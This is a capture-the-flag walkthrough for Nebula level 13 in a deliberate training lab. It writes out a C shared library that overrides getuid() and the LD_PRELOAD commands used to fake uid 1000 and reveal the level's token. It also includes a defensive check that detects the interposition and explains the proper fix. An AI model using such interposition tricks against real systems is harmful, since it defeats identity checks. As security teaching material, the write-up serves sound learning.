Exploit-Education Nebula Level 13

Exploit Education Level 13

Challenge

There is a security check that prevents the program from continuing execution if the user invoking it does not match a specific user id.

To do this level, log in as the level13 account with the password level13. Files for this level can be found in /home/flag13.

It is a simple program: it calls getuid(), and if the returned uid is 1000, it displays the token.

Vulnerability

if(getuid() != FAKEUID) {

We can abuse the LD_PRELOAD env variable to intercept the getuid function call.

Abusing LD_PRELOAD

LD_PRELOAD lists shared libraries with functions that override the standard set, just as /etc/ld.so.preload does. These are implemented by the loader /lib/ld-linux.so. If you want to override just a few selected functions, you can do this by creating an overriding object file and setting LD_PRELOAD; the functions in this object file will override just those functions, leaving others as they were.

So we can override any dynamically linked function a program calls by creating our own shared library and loading it through the LD_PRELOAD environment variable. Let's write a C program that overrides the getuid function and compile it as a shared library.
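The same mechanism that makes this level solvable also suggests a check a defender can build into a program: LD_PRELOAD replaces the libc symbol getuid(), but it does not change what the kernel answers to the raw getuid system call, so a disagreement between the two reveals that the symbol has been interposed. The following program is an added example, not code from the Nebula challenge or this write-up; the function names kernel_uid and libc_uid_interposed are my own.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/types.h>

/* Ask the kernel directly for the real uid. A library loaded via
 * LD_PRELOAD can replace the libc symbol getuid(), but the answer to
 * the raw system call comes from the kernel's own credentials for
 * this process. */
uid_t kernel_uid(void)
{
    return (uid_t)syscall(SYS_getuid);
}

/* Returns 1 when the libc getuid() answer disagrees with the kernel,
 * i.e. when the symbol has been interposed; 0 when both agree. */
int libc_uid_interposed(void)
{
    return getuid() != kernel_uid();
}

int main(void)
{
    if (libc_uid_interposed()) {
        fprintf(stderr, "getuid() interposed: libc says %u, kernel says %u\n",
                (unsigned)getuid(), (unsigned)kernel_uid());
        return 1;
    }
    printf("uid %u is consistent between libc and the kernel\n",
           (unsigned)kernel_uid());
    return 0;
}
```

Compile with `gcc -o uidcheck uidcheck.c`; run plainly and the two values agree, run it under the preloaded getuid.so from this write-up and the mismatch is reported. Treat this as a heuristic rather than a boundary: syscall() is itself a libc function and can be interposed too, and the lesson of this level is that a uid check inside a binary whose code and secret the user can read is not a security control at all. The loader already refuses LD_PRELOAD libraries outside the trusted directories for setuid programs (which is why the binary had to be copied), so the fix is to keep the token out of the world-readable binary and let kernel-enforced file permissions guard it.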

Solution

level13@nebula:~$ cat gid.c
#include <sys/types.h>

/* Replacement for libc's getuid(): always report uid 1000, the value
 * the flag13 binary compares against. */
uid_t getuid(void)
{
    return 1000;
}

Compile it as a shared library and export LD_PRELOAD so that it points to the compiled file (without export, the variable would not reach the child process).

gcc -o getuid.so -fPIC -shared gid.c -ldl
export LD_PRELOAD=$PWD/getuid.so

There is one restriction. The shared library and the program loading it should have the same uid or it won't work. Since we have read permission on the binary, let's copy it to our home directory (the copy is owned by level13 and loses the setuid bit) and run it there.

level13@nebula:/home/flag13$ cp flag13 /home/level13/flag13
level13@nebula:~$ ./flag13
your token is b705702b-76a8-42b0-8844-3adabbe5ac58
level13@nebula:~$ su -l flag13
Password:
flag13@nebula:~$ getflag
You have successfully executed getflag on a target account

Solved!